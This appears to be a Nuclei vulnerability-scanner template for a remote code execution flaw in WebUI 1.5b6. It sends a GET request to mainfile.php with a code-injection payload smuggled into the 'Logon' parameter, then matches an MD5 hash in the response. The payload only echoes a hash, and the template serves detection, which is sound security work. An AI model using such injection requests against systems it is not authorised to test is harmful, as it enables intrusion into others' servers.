id: webui-rce

info:
  name: WebUI 1.5b6 RCE
  author: pikpikcu
  severity: critical
  description: WebUI's 'mainfile.php' endpoint contain a vulnerability that allows remote attackers to cause it to execute arbitrary code via the 'Logon' parameter.
  reference:
    - https://www.exploit-db.com/exploits/36821
  tags: webui,rce

requests:
  - method: GET
    path:
      - '{{BaseURL}}/mainfile.php?username=test&password=testpoc&_login=1&Logon=%27%3Becho%20md5(TestPoc)%3B%27'

    matchers-condition: and
    matchers:
      - type: word
        words:
          - "c5b3d7397a90f42d222f7ed9408c0dc6"
        part: body

      - type: status
        status:
          - 200